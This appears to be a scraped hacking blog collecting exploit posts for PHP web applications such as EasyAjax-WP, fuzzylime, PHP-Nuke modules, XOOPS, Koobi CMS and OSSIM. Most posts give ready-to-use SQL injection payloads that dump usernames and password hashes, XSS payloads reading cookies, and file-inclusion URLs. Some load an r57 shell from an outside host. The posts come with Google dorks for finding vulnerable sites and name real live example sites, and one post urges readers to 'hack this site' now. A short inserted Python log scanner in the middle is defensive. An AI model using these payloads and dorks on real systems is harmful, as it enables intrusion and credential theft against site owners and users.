EasyAjax-WP 0.89 Local file include + Dork
###########################################
EasyAjax-WP 0.89 Local file include
vul. script : EasyAjax-WP
version : 0.89
Plugin URI: http://www.getonthenet.eu/wordpress/
Description: This plugin provides a quick and easy way to install and uninstall Ajax-WP (http://www.giannim.com/blog/index.php?page_id=13) on your WordPress Blog. A config page is also added to make setting up a breeze.
Discovered by Afshin.M *** WWW.AfshinBlog.wordpress.com
###########################################
Exploit :
http://[TARGET]/[wordpress]/index.php#http%3A%2F%2F[TARGET]%2F| <===> File list
Change http%3A%2F%2F[TARGET]%2F| to another directory.
For example : http://localhost/wordpress/index.php#http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-includes|
** Attention : You must put | end of url **
Note: if you want to include a file, don't put %2F at the end of the URL.
And if you want to see the list of files, you must put %2F …
Dork:
allinurl:”wp-content/plugins/EasyAjax-WP”
allinurl:”ajax-wp.0.85″
allinurl:”EasyAjax-WP.php”
allinurl:”ajax-wp.php”
allinurl:”ajax-wp.js”
Example :
http://www.getonthenet.eu/#http%3A%2F%2Fwww.getonthenet.eu%2Fwp-admin%2F|
OR
http://www.getonthenet.eu/#http%3A%2F%2Fwww.getonthenet.eu%2Fwp-content%2Fplugins%2FEasyAjax-WP%2Fajax-wp.0.85%2Fimages%2Floading.gif|
+===============================================+
discuss your questions in www.afshinblog.wordpress.com
Regard, Afshin.Mehrabany
fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability + Dork
vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
author: irk4z@yahoo.pl
# code:
/code/display.php:
…
1 <?
2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace("../", "", $s);
5 $p = str_replace("../", "", $p);
6 if(empty($s)) $s = "front";
7 if(empty($p)) $p = "index";
8 $curs = $s;
9 $curp = $p;
10
11 include "code/settings.inc.php";
12 include "${admindir}/languages/english.inc.php";
…
line 11: ./code/code/settings.inc.php does not exist, so $admindir is empty
:D
Exploit:
http://[TARGET]/[PATH]/code/display.php?admindir=http://afshinblog.110mb.com/r57shell1.35.txt?
Dork: “powered by fuzzylime”
Regard, Afshin.m
EasyGallery <= 5.0tr – Multiple Remote Vulnerabilities + Dork
Welcome,
Exploit: Multiple Remote Vulnerabilities [High] [+] Remote SQL Injection with DORK:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*
+========================+
[+] Cross Site Scripting in URI:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[~] Example: >”><ScRiPt>alert(“JosS)</ScRiPt>
+========================+
[+] Cross Site Scripting:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[~] Example: %22+onmouseover=alert(“JosS”)+
Dork(s):
allinurl:easygallery/index.php
allinurl:EasyGallery
Powered by EasyGallery 5.0
+=======================+
Visit my blog again, i have HOT articles!
Good luck, Afshin.m
BM Classifieds (listingid),(ad)SQL Injection Vulnerability + Dork
Hi friend,
BM Classifieds (listingid),(ad)SQL Injection Vulnerability
AUTHOR : xcorpitx
Exploit(s) :
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0×3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0×3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Dork(s):
Dork 1 : “showad.php?listingid=”
Dork 2 : “pfriendly.php?ad=”
Example : http://www.njballyhoo.com/
Regard, Afshin.m
A site full of bugs!
Hi all!
Go to this address :
http://go.erestor.net/
You can hack this site easily!
in “http://go.erestor.net/?page=show_user.php” you can “Include” files from server!
in http://go.erestor.net/?page=show_user.php&username=’ you can execute SQL command and enjoy!!!
And here => http://go.erestor.net/?page=welcome.php&msg=%3Cfont%20size=70%3Ehacked??!!%3C/font%3E
This is good example to learn hack.
Try it now!
Good luck, Afshin.m
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability + Dork
Hi all.
AUTHOR : S@BUN
DORK : allinurl: “modules/glossaires”
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
Example : www.guitargearheads.com
Have a nice day!
Regard, Afshin.m
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability + Dork
Hi friends.
+====================+
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
Exploit :
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
Dork : You can use Dork creator or
allinurl:index.php?option=com_musica
By writing comment, help me to write best article.
Regard, Afshin.m
Fast dork creator – HOT!
hi all.
now you can use the “Dork creator” for create dork and find vulnerable sites, easy!
Address : http://afshinblog.110mb.com/dork-creator
Fill box and creator dork.
if you have problem, comments help you!
Good luck!
Afshin.m
Koobi CMS 4.3.0 – 4.2.3 (index.php categ) Remote SQL Injection + Dork
Spanish Hackers Team (www.spanish-hackers.com)
Koobi CMS 4.3.0 – 4.2.3 (index.php categ) Remote SQL Injection
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Koobi CMS 4.3.0 – 4.2.3
[~] HomePage: http://www.dream4.de/
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit v4.3.0 – v4.2.4:
[~] Table: koobi4_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0×203a3a20,pass),3+from+koobi4_user/*
[+] Exploit v4.2.3:
[~] Table_ koobi_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0×203a3a20,pass),3+from+koobi_user/*
Dork: inurl:index.php?showlink=1&fid=8&p=links&area=1&categ
Good luck!
Afshin.m
SiteBuilderElite1.2 Multiple Remote File Inclusion + Dork
Hi again
all are exploitable by the variable “CarpPath” for example
http://[target]/files/carprss.php?CarpPath=[Evil_Code]
Dork : allinurl:carprss.php (May not work perfectly!)
Example:
http://dalzsfo.com/carprss.php?CarpPath=http://www.afshinblog.110mb.com
Good luck!
Hack sites without using CMS.
Hi all.
You can hack many websites with search in google…
Now i say you how you can search some keywords and hack the vulnerable sites without using the CMS vulnerability.
Search in google : allinurl:”?page=login.php”
The result show you vulnerable sites that you can hack sites with “Remote file include”.
You can change the “login.php” to the “evil code” (Sheller) and access to the files.
If you try, you can hack many sites that not using CMS!!!
And you dont need the milw0rm and … for find vulnerable CMS and sites.
This is easy way for hacking.
Examples find by this method:
Note: You can find some sheller and evil code in http://afshinblog.110mb.com/
Good luck, Afshin.m
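Added example (not from the original posts): a defender-side access-log check for the two request shapes these posts rely on, a URL passed in an include-path parameter (admindir, CarpPath, page) and a UNION SELECT whose whitespace is replaced by /**/ or +. The log lines are constructed, and the URL_PARAMS_ALLOWED allowlist is an assumption for parameters that legitimately carry URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (documentation addresses and placeholder hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Feb/2008:10:00:01 +0000] "GET /code/display.php?admindir=http://files.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Feb/2008:10:00:05 +0000] "GET /files/carprss.php?CarpPath=hTTp%3A%2F%2Ffiles.example%2F HTTP/1.1" 200 90',
    '203.0.113.9 - - [21/Feb/2008:10:01:00 +0000] "GET /modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/* HTTP/1.1" 200 733',
    '203.0.113.9 - - [21/Feb/2008:10:01:09 +0000] "GET /index.php?categ=-4+union+all+select+1,2,3 HTTP/1.1" 200 733',
    '192.0.2.44 - - [21/Feb/2008:10:02:00 +0000] "GET /index.php?page=login.php HTTP/1.1" 200 1200',
    '192.0.2.44 - - [21/Feb/2008:10:02:03 +0000] "GET /out.php?url=http://partner.example/ HTTP/1.1" 302 0',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)          # value is itself a URL
SQL_COMMENT = re.compile(r'/\*.*?\*/', re.S)                     # /**/ used as whitespace
UNION_SELECT = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)
URL_PARAMS_ALLOWED = {"url"}  # assumption: parameters that are expected to hold a URL


def classify(line):
    """Return a sorted list of (parameter, finding) pairs for one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = set()
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if REMOTE_URL.match(value) and name.lower() not in URL_PARAMS_ALLOWED:
            findings.add((name, "remote-include"))
        # Replace inline SQL comments with spaces before matching.
        if UNION_SELECT.search(SQL_COMMENT.sub(" ", value)):
            findings.add((name, "union-select"))
    return sorted(findings)


def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    return {i: f for i, line in enumerate(lines, 1) if (f := classify(line))}


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

A hit on a parameter that feeds include or require means the script should map the value to a fixed allowlist of local files rather than use it as a path.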
PHP-NUKE Modules NukeC Module’s Version: 2.1 Remote SQL Injection + Dork
PHP-NUKE Modules NukeC Module’s Version: 2.1 Remote SQL Injection
Found: DamaR
contact: By.DamaR@Hotmail.Com
Exploit:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Dork : inurl:”modules.php?name=NukeC”
Example : www.sada.co.z/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Module Copyright © Information
NukeC module for PHP-Nuke
Module’s Name: NukeC
Module’s Version: 2.1
Module’s Description: NukeC – The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules even though you are not a PHP programmer.
NukeC 2.1 only works on PHP-Nuke 6.5. Please download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke versions.
License: GNU/GPL
Author’s Name: Sudirman Angriawan
Author’s Email: nukecpower@yahoo.com
Good luck!
Afshin.m
OSSIM 0.9.9rc5 (XSS/SQL Injection) Multiple Remote Vulnerabilities + Dork
Application: OSSIM
http://www.ossim.net
Version: 0.9.9rc5
Note: it is possible that the problem affects also earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com
—————————————
1) Introduction
OSSIM is a free implementation of a Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, …) managed from an easy-to-use web panel.
2) SQL injection
The bug exists in the portname parameter of modifyportform.php
It’s possible to obtain the hashed administrator password when the user has rights to do port modification in the “PORTS” tab.
http://[target]/[ossim]/port/modifyportform.php?portname=ANY’%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login=’admin
3) XSS
Quotes in OSSIM aren’t properly sanitized.
The XSS below may be executed without logging into OSSIM.
http://[target]/[ossim]/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!–
Dork : inurl:”login.php?dest”
Example : http://www.slooh.com/login.php?dest=%22%3E%3Cscript%3Ealert(%22WwW.AfshinBlog.WordPress.com%22)%3C/script%3E%3C!–
Good luck!
Afshin.m
PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability + Dork
Title : Php – Nuke Module Inhalt Sql
Author : Crackers_Child
Mail : Cashr00t@hotmail.com
Dork : allinurl:”modules.php?name=Inhalt”
Exploit :
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Greetz: Str0ke , biyofrm.com , indir21.com , sibersavascilar.com , tryag.cc
Regard, Afshin.m
php-nuke modules Docum remote sql injection +Dork
php-nuke modules Docum remote sql inj
Found:DamaR
By.Damar@Hotmail.Com
The hack is over, but the return is near. Since 2000
——————————————————————————-
Dork : allinurl:”modules.php?name=Docum”
/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
Example: http://www.metalthunder.com.ar/mt
Regard, Afshin.m
MultiCart 2.0 Remote Blind SQL Injection Vulnerability (productdetails.php) + Dork
Hi all.
Vulnerable file :
www.[target]/[MultiCart 2.0]/productdetails.php?productid=[SQL CODE]
Dork : allinurl:”productdetails.php?productid=”
Vulnerable site :
http://www.spaceconnection.org/
Good luck!

